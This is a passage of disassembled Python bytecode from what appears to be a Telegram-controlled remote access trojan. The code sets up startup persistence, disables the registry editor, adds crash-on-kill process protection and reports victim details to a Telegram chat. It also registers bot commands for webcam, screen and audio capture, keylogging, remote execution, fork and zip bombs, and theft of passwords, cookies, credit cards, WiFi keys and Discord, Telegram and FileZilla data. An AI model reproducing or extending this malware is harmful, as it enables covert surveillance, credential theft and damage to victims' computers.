 L. 193      1554  LOAD_NAME                RegeditDisableRegistryTools
             1556  CALL_FUNCTION_0       0  ''
             1558  POP_TOP          

 L. 194      1560  LOAD_NAME                open
             1562  LOAD_NAME                Directory
             1564  LOAD_STR                 'RegeditDisableRegistryTools'
             1566  BINARY_ADD       
             1568  LOAD_STR                 'a'
             1570  CALL_FUNCTION_2       2  ''
             1572  LOAD_METHOD              close
             1574  CALL_METHOD_0         0  ''
             1576  POP_TOP          

 L. 195      1578  LOAD_NAME                print
             1580  LOAD_STR                 '[+] › regedit.exe has been disabled\n'
             1582  CALL_FUNCTION_1       1  ''
             1584  POP_TOP          
           1586_0  COME_FROM          1550  '1550'
           1586_1  COME_FROM          1520  '1520'
           1586_2  COME_FROM          1490  '1490'

 L. 200      1586  LOAD_NAME                AutorunEnabled
             1588  LOAD_CONST               True
             1590  <117>                 0  ''
         1592_1594  POP_JUMP_IF_FALSE  1772  'to 1772'

 L. 202      1596  LOAD_NAME                SchtasksExists
             1598  LOAD_NAME                AutorunName
             1600  CALL_FUNCTION_1       1  ''
         1602_1604  POP_JUMP_IF_FALSE  1652  'to 1652'
             1606  LOAD_NAME                InstallPathExists
             1608  LOAD_NAME                InstallPath
             1610  LOAD_NAME                ProcessName
             1612  CALL_FUNCTION_2       2  ''
             1614  LOAD_CONST               True
             1616  <117>                 0  ''
         1618_1620  POP_JUMP_IF_FALSE  1652  'to 1652'

 L. 203      1622  LOAD_NAME                print
             1624  LOAD_STR                 '[+] › '
             1626  LOAD_NAME                CurrentName
             1628  BINARY_ADD       
             1630  LOAD_STR                 ' ‹ is already in startup › '
             1632  BINARY_ADD       
             1634  LOAD_NAME                InstallPath
             1636  BINARY_ADD       
             1638  LOAD_NAME                ProcessName
             1640  BINARY_ADD       
             1642  LOAD_STR                 '\n'
             1644  BINARY_ADD       
             1646  CALL_FUNCTION_1       1  ''
             1648  POP_TOP          
             1650  JUMP_FORWARD       1772  'to 1772'
           1652_0  COME_FROM          1618  '1618'
           1652_1  COME_FROM          1602  '1602'

 L. 206      1652  LOAD_NAME                Admin
             1654  CALL_FUNCTION_0       0  ''
             1656  LOAD_CONST               False
             1658  <117>                 0  ''
         1660_1662  POP_JUMP_IF_FALSE  1672  'to 1672'

 L. 207      1664  LOAD_NAME                print
             1666  LOAD_STR                 '[-] › This function requires admin rights\n'
             1668  CALL_FUNCTION_1       1  ''
             1670  POP_TOP          
           1672_0  COME_FROM          1660  '1660'

 L. 209      1672  LOAD_NAME                Admin
             1674  CALL_FUNCTION_0       0  ''
             1676  LOAD_CONST               True
             1678  <117>                 0  ''
         1680_1682  POP_JUMP_IF_FALSE  1772  'to 1772'

 L. 210      1684  LOAD_NAME                AddToAutorun
             1686  LOAD_NAME                AutorunName
             1688  LOAD_NAME                InstallPath
             1690  LOAD_NAME                ProcessName
             1692  CALL_FUNCTION_3       3  ''
             1694  POP_TOP          

 L. 212      1696  LOAD_NAME                os
             1698  LOAD_ATTR                path
             1700  LOAD_METHOD              exists
             1702  LOAD_NAME                InstallPath
             1704  LOAD_NAME                ProcessName
             1706  BINARY_ADD       
             1708  CALL_METHOD_1         1  ''
         1710_1712  POP_JUMP_IF_TRUE   1744  'to 1744'

 L. 213      1714  SETUP_FINALLY      1732  'to 1732'

 L. 214      1716  LOAD_NAME                CopyToAutorun
             1718  LOAD_NAME                CurrentPath
             1720  LOAD_NAME                InstallPath
             1722  LOAD_NAME                ProcessName
             1724  CALL_FUNCTION_3       3  ''
             1726  POP_TOP          
             1728  POP_BLOCK        
             1730  JUMP_FORWARD       1744  'to 1744'
           1732_0  COME_FROM_FINALLY  1714  '1714'

 L. 215      1732  POP_TOP          
             1734  POP_TOP          
             1736  POP_TOP          

 L. 216      1738  POP_EXCEPT       
             1740  JUMP_FORWARD       1744  'to 1744'
             1742  <48>             
           1744_0  COME_FROM          1740  '1740'
           1744_1  COME_FROM          1730  '1730'
           1744_2  COME_FROM          1710  '1710'

 L. 218      1744  LOAD_NAME                print
             1746  LOAD_STR                 '[+] › '
             1748  LOAD_NAME                CurrentName
             1750  BINARY_ADD       
             1752  LOAD_STR                 ' ‹ has been copied to startup › '
             1754  BINARY_ADD       
             1756  LOAD_NAME                InstallPath
             1758  BINARY_ADD       
             1760  LOAD_NAME                ProcessName
             1762  BINARY_ADD       
             1764  LOAD_STR                 '\n'
             1766  BINARY_ADD       
             1768  CALL_FUNCTION_1       1  ''
             1770  POP_TOP          
           1772_0  COME_FROM          1680  '1680'
           1772_1  COME_FROM          1650  '1650'
           1772_2  COME_FROM          1592  '1592'

 L. 223      1772  LOAD_NAME                DisplayMessageBox
             1774  LOAD_CONST               True
             1776  <117>                 0  ''
         1778_1780  POP_JUMP_IF_FALSE  1826  'to 1826'

 L. 225      1782  LOAD_NAME                os
             1784  LOAD_ATTR                path
             1786  LOAD_METHOD              exists
             1788  LOAD_NAME                Directory
             1790  LOAD_STR                 'DisplayMessageBox'
             1792  BINARY_ADD       
             1794  CALL_METHOD_1         1  ''
         1796_1798  POP_JUMP_IF_TRUE   1826  'to 1826'

 L. 226      1800  LOAD_NAME                open
             1802  LOAD_NAME                Directory
             1804  LOAD_STR                 'DisplayMessageBox'
             1806  BINARY_ADD       
             1808  LOAD_STR                 'a'
             1810  CALL_FUNCTION_2       2  ''
             1812  LOAD_METHOD              close
             1814  CALL_METHOD_0         0  ''
             1816  POP_TOP          

 L. 227      1818  LOAD_NAME                MessageBox
             1820  LOAD_NAME                Message
             1822  CALL_FUNCTION_1       1  ''
             1824  POP_TOP          
           1826_0  COME_FROM          1796  '1796'
           1826_1  COME_FROM          1778  '1778'

 L. 232      1826  LOAD_NAME                ProcessBSODProtectionEnabled
             1828  LOAD_CONST               True
             1830  <117>                 0  ''
         1832_1834  POP_JUMP_IF_FALSE  1924  'to 1924'

 L. 234      1836  LOAD_NAME                Admin
             1838  CALL_FUNCTION_0       0  ''
             1840  LOAD_CONST               False
             1842  <117>                 0  ''
         1844_1846  POP_JUMP_IF_FALSE  1856  'to 1856'

 L. 235      1848  LOAD_NAME                print
             1850  LOAD_STR                 '[-] › This function requires admin rights\n'
             1852  CALL_FUNCTION_1       1  ''
             1854  POP_TOP          
           1856_0  COME_FROM          1844  '1844'

 L. 237      1856  LOAD_NAME                Admin
             1858  CALL_FUNCTION_0       0  ''
             1860  LOAD_CONST               True
             1862  <117>                 0  ''
         1864_1866  POP_JUMP_IF_FALSE  1924  'to 1924'

 L. 238      1868  LOAD_NAME                platform
             1870  LOAD_METHOD              release
             1872  CALL_METHOD_0         0  ''
             1874  LOAD_STR                 '10'
             1876  COMPARE_OP               ==
         1878_1880  POP_JUMP_IF_FALSE  1896  'to 1896'

 L. 239      1882  LOAD_NAME                Thread
             1884  LOAD_NAME                ProcessChecker
             1886  LOAD_CONST               ('target',)
             1888  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             1890  LOAD_METHOD              start
             1892  CALL_METHOD_0         0  ''
             1894  POP_TOP          
           1896_0  COME_FROM          1878  '1878'

 L. 241      1896  LOAD_NAME                platform
             1898  LOAD_METHOD              release
             1900  CALL_METHOD_0         0  ''
             1902  LOAD_STR                 '10'
             1904  COMPARE_OP               !=
         1906_1908  POP_JUMP_IF_FALSE  1916  'to 1916'

 L. 242      1910  LOAD_NAME                SetProtection
             1912  CALL_FUNCTION_0       0  ''
             1914  POP_TOP          
           1916_0  COME_FROM          1906  '1906'

 L. 244      1916  LOAD_NAME                print
             1918  LOAD_STR                 '[+] › Process protection has been activated\n'
             1920  CALL_FUNCTION_1       1  ''
             1922  POP_TOP          
           1924_0  COME_FROM          1864  '1864'
           1924_1  COME_FROM          1832  '1832'

 L. 250      1924  SETUP_FINALLY      2032  'to 2032'

 L. 252      1926  LOAD_NAME                Admin
             1928  CALL_FUNCTION_0       0  ''
             1930  LOAD_CONST               True
             1932  <117>                 0  ''
         1934_1936  POP_JUMP_IF_FALSE  1942  'to 1942'

 L. 253      1938  LOAD_STR                 '🔘 Online!'
             1940  STORE_NAME               Online
           1942_0  COME_FROM          1934  '1934'

 L. 255      1942  LOAD_NAME                Admin
             1944  CALL_FUNCTION_0       0  ''
             1946  LOAD_CONST               False
             1948  <117>                 0  ''
         1950_1952  POP_JUMP_IF_FALSE  1958  'to 1958'

 L. 256      1954  LOAD_STR                 '🟢 Online!'
             1956  STORE_NAME               Online
           1958_0  COME_FROM          1950  '1950'

 L. 258      1958  LOAD_NAME                bot
             1960  LOAD_ATTR                send_message
             1962  LOAD_NAME                TelegramChatID

 L. 259      1964  LOAD_STR                 '\n*'
             1966  LOAD_NAME                Online
             1968  BINARY_ADD       
             1970  LOAD_STR                 '\n\nPC » '
             1972  BINARY_ADD       

 L. 260      1974  LOAD_NAME                os
             1976  LOAD_METHOD              getlogin
             1978  CALL_METHOD_0         0  ''

 L. 259      1980  BINARY_ADD       

 L. 261      1982  LOAD_STR                 '\nOS » '

 L. 259      1984  BINARY_ADD       

 L. 261      1986  LOAD_NAME                Windows
             1988  CALL_FUNCTION_0       0  ''

 L. 259      1990  BINARY_ADD       

 L. 262      1992  LOAD_STR                 '\n\nAV » '

 L. 259      1994  BINARY_ADD       

 L. 263      1996  LOAD_NAME                Antivirus
             1998  LOAD_CONST               0
             2000  BINARY_SUBSCR    

 L. 259      2002  BINARY_ADD       

 L. 264      2004  LOAD_STR                 '\n\nIP » '

 L. 259      2006  BINARY_ADD       

 L. 265      2008  LOAD_NAME                Geolocation
             2010  LOAD_STR                 'query'
             2012  CALL_FUNCTION_1       1  ''

 L. 259      2014  BINARY_ADD       

 L. 265      2016  LOAD_STR                 '*'

 L. 259      2018  BINARY_ADD       

 L. 266      2020  LOAD_STR                 'Markdown'

 L. 258      2022  LOAD_CONST               ('parse_mode',)
             2024  CALL_FUNCTION_KW_3     3  '3 total positional and keyword args'
             2026  POP_TOP          
             2028  POP_BLOCK        
             2030  JUMP_FORWARD       2086  'to 2086'
           2032_0  COME_FROM_FINALLY  1924  '1924'

 L. 268      2032  DUP_TOP          
             2034  LOAD_NAME                Exception
         2036_2038  <121>              2084  ''
             2040  POP_TOP          
             2042  STORE_NAME               e
             2044  POP_TOP          
             2046  SETUP_FINALLY      2076  'to 2076'

 L. 269      2048  LOAD_NAME                print
             2050  LOAD_STR                 '[-] › Retrying connect to api.telegram.org\n'
             2052  CALL_FUNCTION_1       1  ''
             2054  POP_TOP          

 L. 270      2056  LOAD_NAME                print
             2058  LOAD_NAME                e
             2060  CALL_FUNCTION_1       1  ''
             2062  POP_TOP          
             2064  POP_BLOCK        
             2066  POP_EXCEPT       
             2068  LOAD_CONST               None
             2070  STORE_NAME               e
             2072  DELETE_NAME              e
             2074  JUMP_BACK          1924  'to 1924'
           2076_0  COME_FROM_FINALLY  2046  '2046'
             2076  LOAD_CONST               None
             2078  STORE_NAME               e
             2080  DELETE_NAME              e
             2082  <48>             
             2084  <48>             
           2086_0  COME_FROM          2030  '2030'

 L. 273      2086  LOAD_NAME                print
             2088  LOAD_STR                 '[+] › Connected to api.telegram.org\n'
             2090  CALL_FUNCTION_1       1  ''
             2092  POP_TOP          

 L. 274  2094_2096  BREAK_LOOP         2102  'to 2102'
         2098_2100  JUMP_BACK          1924  'to 1924'

 L. 279      2102  LOAD_NAME                bot
             2104  LOAD_ATTR                message_handler
             2106  LOAD_STR                 '/Screen'
             2108  LOAD_CONST               ('regexp',)
             2110  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 280      2112  LOAD_CODE                <code_object Screen>
             2114  LOAD_STR                 'Screen'
             2116  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2118  CALL_FUNCTION_1       1  ''
             2120  STORE_NAME               Screen

 L. 297      2122  LOAD_NAME                bot
             2124  LOAD_ATTR                message_handler
             2126  LOAD_STR                 '/Webcam'
             2128  LOAD_CONST               ('regexp',)
             2130  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 298      2132  LOAD_CODE                <code_object Webcam>
             2134  LOAD_STR                 'Webcam'
             2136  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2138  CALL_FUNCTION_1       1  ''
             2140  STORE_NAME               Webcam

 L. 318      2142  LOAD_NAME                bot
             2144  LOAD_ATTR                message_handler
             2146  LOAD_STR                 '/Audio'
             2148  LOAD_CONST               ('regexp',)
             2150  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 319      2152  LOAD_CODE                <code_object Audio>
             2154  LOAD_STR                 'Audio'
             2156  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2158  CALL_FUNCTION_1       1  ''
             2160  STORE_NAME               Audio

 L. 345      2162  LOAD_CODE                <code_object SendMessage>
             2164  LOAD_STR                 'SendMessage'
             2166  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2168  STORE_NAME               SendMessage

 L. 354      2170  LOAD_NAME                bot
             2172  LOAD_ATTR                callback_query_handler
             2174  LOAD_LAMBDA              '<code_object <lambda>>'
             2176  LOAD_STR                 '<lambda>'
             2178  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2180  LOAD_CONST               ('func',)
             2182  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 355      2184  LOAD_CODE                <code_object CallbackInline>
             2186  LOAD_STR                 'CallbackInline'
             2188  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2190  CALL_FUNCTION_1       1  ''
             2192  STORE_NAME               CallbackInline

 L. 471      2194  LOAD_NAME                bot
             2196  LOAD_ATTR                message_handler
             2198  LOAD_STR                 '/CD'
             2200  LOAD_CONST               ('regexp',)
             2202  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 472      2204  LOAD_CODE                <code_object CD>
             2206  LOAD_STR                 'CD'
             2208  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2210  CALL_FUNCTION_1       1  ''
             2212  STORE_NAME               CD

 L. 488      2214  LOAD_NAME                bot
             2216  LOAD_ATTR                message_handler
             2218  LOAD_STR                 '/ls'
             2220  LOAD_CONST               ('regexp',)
             2222  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 489      2224  LOAD_CODE                <code_object ls>
             2226  LOAD_STR                 'ls'
             2228  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2230  CALL_FUNCTION_1       1  ''
             2232  STORE_NAME               ls

 L. 509      2234  LOAD_NAME                bot
             2236  LOAD_ATTR                message_handler
             2238  LOAD_STR                 'Remove'
             2240  LOAD_STR                 'remove'
             2242  BUILD_LIST_2          2 
             2244  LOAD_CONST               ('commands',)
             2246  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 510      2248  LOAD_CODE                <code_object Remove>
             2250  LOAD_STR                 'Remove'
             2252  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2254  CALL_FUNCTION_1       1  ''
             2256  STORE_NAME               Remove

 L. 578      2258  LOAD_NAME                bot
             2260  LOAD_ATTR                message_handler
             2262  LOAD_STR                 'RemoveAll'
             2264  LOAD_STR                 'removeall'
             2266  BUILD_LIST_2          2 
             2268  LOAD_CONST               ('commands',)
             2270  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 579      2272  LOAD_CODE                <code_object RemoveAll>
             2274  LOAD_STR                 'RemoveAll'
             2276  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2278  CALL_FUNCTION_1       1  ''
             2280  STORE_NAME               RemoveAll

 L. 624      2282  LOAD_NAME                bot
             2284  LOAD_ATTR                message_handler
             2286  LOAD_STR                 '/Upload'
             2288  LOAD_CONST               ('regexp',)
             2290  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 625      2292  LOAD_CODE                <code_object Upload>
             2294  LOAD_STR                 'Upload'
             2296  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2298  CALL_FUNCTION_1       1  ''
             2300  STORE_NAME               Upload

 L. 645      2302  LOAD_NAME                bot
             2304  LOAD_ATTR                message_handler
             2306  LOAD_STR                 'document'
             2308  BUILD_LIST_1          1 
             2310  LOAD_CONST               ('content_types',)
             2312  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 646      2314  LOAD_CODE                <code_object Document>
             2316  LOAD_STR                 'Document'
             2318  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2320  CALL_FUNCTION_1       1  ''
             2322  STORE_NAME               Document

 L. 672      2324  LOAD_NAME                bot
             2326  LOAD_ATTR                message_handler
             2328  LOAD_STR                 '/Download'
             2330  LOAD_CONST               ('regexp',)
             2332  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 673      2334  LOAD_CODE                <code_object Download>
             2336  LOAD_STR                 'Download'
             2338  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2340  CALL_FUNCTION_1       1  ''
             2342  STORE_NAME               Download

 L. 715      2344  LOAD_NAME                bot
             2346  LOAD_ATTR                message_handler
             2348  LOAD_STR                 'Run'
             2350  LOAD_STR                 'run'
             2352  BUILD_LIST_2          2 
             2354  LOAD_CONST               ('commands',)
             2356  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 716      2358  LOAD_CODE                <code_object Run>
             2360  LOAD_STR                 'Run'
             2362  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2364  CALL_FUNCTION_1       1  ''
             2366  STORE_NAME               Run

 L. 735      2368  LOAD_NAME                bot
             2370  LOAD_ATTR                message_handler
             2372  LOAD_STR                 'RunAS'
             2374  LOAD_STR                 'runas'
             2376  BUILD_LIST_2          2 
             2378  LOAD_CONST               ('commands',)
             2380  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 736      2382  LOAD_CODE                <code_object RunAS>
             2384  LOAD_STR                 'RunAS'
             2386  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2388  CALL_FUNCTION_1       1  ''
             2390  STORE_NAME               RunAS

 L. 754      2392  LOAD_NAME                bot
             2394  LOAD_ATTR                message_handler
             2396  LOAD_STR                 '/Tasklist'
             2398  LOAD_CONST               ('regexp',)
             2400  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 755      2402  LOAD_CODE                <code_object Tasklist>
             2404  LOAD_STR                 'Tasklist'
             2406  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2408  CALL_FUNCTION_1       1  ''
             2410  STORE_NAME               Tasklist

 L. 761      2412  LOAD_NAME                bot
             2414  LOAD_ATTR                message_handler
             2416  LOAD_STR                 '/Taskkill'
             2418  LOAD_CONST               ('regexp',)
             2420  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 762      2422  LOAD_CODE                <code_object Taskkill>
             2424  LOAD_STR                 'Taskkill'
             2426  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2428  CALL_FUNCTION_1       1  ''
             2430  STORE_NAME               Taskkill

 L. 787      2432  LOAD_NAME                bot
             2434  LOAD_ATTR                message_handler
             2436  LOAD_STR                 '/Message'
             2438  LOAD_CONST               ('regexp',)
             2440  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 788      2442  LOAD_CODE                <code_object Message>
             2444  LOAD_STR                 'Message'
             2446  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2448  CALL_FUNCTION_1       1  ''
             2450  STORE_NAME               Message

 L. 801      2452  LOAD_NAME                bot
             2454  LOAD_ATTR                message_handler
             2456  LOAD_STR                 '/Speak'
             2458  LOAD_CONST               ('regexp',)
             2460  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 802      2462  LOAD_CODE                <code_object Speak>
             2464  LOAD_STR                 'Speak'
             2466  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2468  CALL_FUNCTION_1       1  ''
             2470  STORE_NAME               Speak

 L. 821      2472  LOAD_NAME                bot
             2474  LOAD_ATTR                message_handler
             2476  LOAD_STR                 '/OpenURL'
             2478  LOAD_CONST               ('regexp',)
             2480  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 822      2482  LOAD_CODE                <code_object OpenURL>
             2484  LOAD_STR                 'OpenURL'
             2486  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2488  CALL_FUNCTION_1       1  ''
             2490  STORE_NAME               OpenURL

 L. 835      2492  LOAD_NAME                bot
             2494  LOAD_ATTR                message_handler
             2496  LOAD_STR                 'photo'
             2498  BUILD_LIST_1          1 
             2500  LOAD_CONST               ('content_types',)
             2502  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 836      2504  LOAD_CODE                <code_object Wallpapers>
             2506  LOAD_STR                 'Wallpapers'
             2508  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2510  CALL_FUNCTION_1       1  ''
             2512  STORE_NAME               Wallpapers

 L. 851      2514  LOAD_NAME                bot
             2516  LOAD_ATTR                message_handler
             2518  LOAD_STR                 '/ForkBomb'
             2520  LOAD_CONST               ('regexp',)
             2522  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 852      2524  LOAD_CODE                <code_object ForkBomb>
             2526  LOAD_STR                 'ForkBomb'
             2528  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2530  CALL_FUNCTION_1       1  ''
             2532  STORE_NAME               ForkBomb

 L. 860      2534  LOAD_NAME                bot
             2536  LOAD_ATTR                message_handler
             2538  LOAD_STR                 '/ZipBomb'
             2540  LOAD_CONST               ('regexp',)
             2542  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 861      2544  LOAD_CODE                <code_object ZipBomb>
             2546  LOAD_STR                 'ZipBomb'
             2548  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2550  CALL_FUNCTION_1       1  ''
             2552  STORE_NAME               ZipBomb

 L. 869      2554  LOAD_NAME                bot
             2556  LOAD_ATTR                message_handler
             2558  LOAD_STR                 '/WiFi'
             2560  LOAD_CONST               ('regexp',)
             2562  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 870      2564  LOAD_CODE                <code_object WiFi>
             2566  LOAD_STR                 'WiFi'
             2568  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2570  CALL_FUNCTION_1       1  ''
             2572  STORE_NAME               WiFi

 L. 889      2574  LOAD_NAME                bot
             2576  LOAD_ATTR                message_handler
             2578  LOAD_STR                 '/FileZilla'
             2580  LOAD_CONST               ('regexp',)
             2582  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 890      2584  LOAD_CODE                <code_object FileZilla>
             2586  LOAD_STR                 'FileZilla'
             2588  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2590  CALL_FUNCTION_1       1  ''
             2592  STORE_NAME               FileZilla

 L. 907      2594  LOAD_NAME                bot
             2596  LOAD_ATTR                message_handler
             2598  LOAD_STR                 '/Discord'
             2600  LOAD_CONST               ('regexp',)
             2602  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 908      2604  LOAD_CODE                <code_object Discord>
             2606  LOAD_STR                 'Discord'
             2608  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2610  CALL_FUNCTION_1       1  ''
             2612  STORE_NAME               Discord

 L. 919      2614  LOAD_NAME                bot
             2616  LOAD_ATTR                message_handler
             2618  LOAD_STR                 '/Telegram'
             2620  LOAD_CONST               ('regexp',)
             2622  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 920      2624  LOAD_CODE                <code_object Telegram>
             2626  LOAD_STR                 'Telegram'
             2628  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2630  CALL_FUNCTION_1       1  ''
             2632  STORE_NAME               Telegram

 L. 936      2634  LOAD_NAME                bot
             2636  LOAD_ATTR                message_handler
             2638  LOAD_STR                 '/CreditCards'
             2640  LOAD_CONST               ('regexp',)
             2642  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 937      2644  LOAD_CODE                <code_object CreditCards>
             2646  LOAD_STR                 'CreditCards'
             2648  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2650  CALL_FUNCTION_1       1  ''
             2652  STORE_NAME               CreditCards

 L. 954      2654  LOAD_NAME                bot
             2656  LOAD_ATTR                message_handler
             2658  LOAD_STR                 '/Bookmarks'
             2660  LOAD_CONST               ('regexp',)
             2662  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 955      2664  LOAD_CODE                <code_object Bookmarks>
             2666  LOAD_STR                 'Bookmarks'
             2668  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2670  CALL_FUNCTION_1       1  ''
             2672  STORE_NAME               Bookmarks

 L. 972      2674  LOAD_NAME                bot
             2676  LOAD_ATTR                message_handler
             2678  LOAD_STR                 '/Passwords'
             2680  LOAD_CONST               ('regexp',)
             2682  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 973      2684  LOAD_CODE                <code_object Passwords>
             2686  LOAD_STR                 'Passwords'
             2688  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2690  CALL_FUNCTION_1       1  ''
             2692  STORE_NAME               Passwords

 L. 990      2694  LOAD_NAME                bot
             2696  LOAD_ATTR                message_handler
             2698  LOAD_STR                 '/Cookies'
             2700  LOAD_CONST               ('regexp',)
             2702  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 991      2704  LOAD_CODE                <code_object Cookies>
             2706  LOAD_STR                 'Cookies'
             2708  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2710  CALL_FUNCTION_1       1  ''
             2712  STORE_NAME               Cookies

 L.1008      2714  LOAD_NAME                bot
             2716  LOAD_ATTR                message_handler
             2718  LOAD_STR                 '/History'
             2720  LOAD_CONST               ('regexp',)
             2722  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1009      2724  LOAD_CODE                <code_object History>
             2726  LOAD_STR                 'History'
             2728  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2730  CALL_FUNCTION_1       1  ''
             2732  STORE_NAME               History

 L.1026      2734  LOAD_NAME                bot
             2736  LOAD_ATTR                message_handler
             2738  LOAD_STR                 '/Clipboard'
             2740  LOAD_CONST               ('regexp',)
             2742  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1027      2744  LOAD_CODE                <code_object Clipboard>
             2746  LOAD_STR                 'Clipboard'
             2748  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2750  CALL_FUNCTION_1       1  ''
             2752  STORE_NAME               Clipboard

 L.1047      2754  LOAD_NAME                bot
             2756  LOAD_ATTR                message_handler
             2758  LOAD_STR                 '/Keylogger'
             2760  LOAD_CONST               ('regexp',)
             2762  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1048      2764  LOAD_CODE                <code_object Keylogger>
             2766  LOAD_STR                 'Keylogger'
             2768  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2770  CALL_FUNCTION_1       1  ''
             2772  STORE_NAME               Keylogger

 L.1060      2774  LOAD_NAME                bot
             2776  LOAD_ATTR                message_handler
             2778  LOAD_STR                 '/SendKeys'
             2780  LOAD_CONST               ('regexp',)
             2782  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1061      2784  LOAD_CODE                <code_object SendKeys>
             2786  LOAD_STR                 'SendKeys'
             2788  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2790  CALL_FUNCTION_1       1  ''
             2792  STORE_NAME               SendKeys

 L.1075      2794  LOAD_NAME                bot
             2796  LOAD_ATTR                message_handler
             2798  LOAD_STR                 '/Rotate'
             2800  LOAD_CONST               ('regexp',)
             2802  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1076      2804  LOAD_CODE                <code_object Rotate>
             2806  LOAD_STR                 'Rotate'
             2808  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2810  CALL_FUNCTION_1       1  ''
             2812  STORE_NAME               Rotate

 L.1097      2814  LOAD_NAME                bot
             2816  LOAD_ATTR                message_handler
             2818  LOAD_STR                 '/Volume'
             2820  LOAD_CONST               ('regexp',)
             2822  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1098      2824  LOAD_CODE                <code_object Volume>
             2826  LOAD_STR                 'Volume'
             2828  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2830  CALL_FUNCTION_1       1  ''
             2832  STORE_NAME               Volume

 L.1114      2834  LOAD_NAME                bot
             2836  LOAD_ATTR                message_handler
             2838  LOAD_STR                 '/Monitor'
             2840  LOAD_CONST               ('regexp',)
             2842  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1115      2844  LOAD_CODE                <code_object Monitor>
             2846  LOAD_STR                 'Monitor'
             2848  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2850  CALL_FUNCTION_1       1  ''
             2852  STORE_NAME               Monitor

 L.1142      2854  LOAD_NAME                bot
             2856  LOAD_ATTR                message_handler
             2858  LOAD_STR                 '/Freeze'
             2860  LOAD_CONST               ('regexp',)
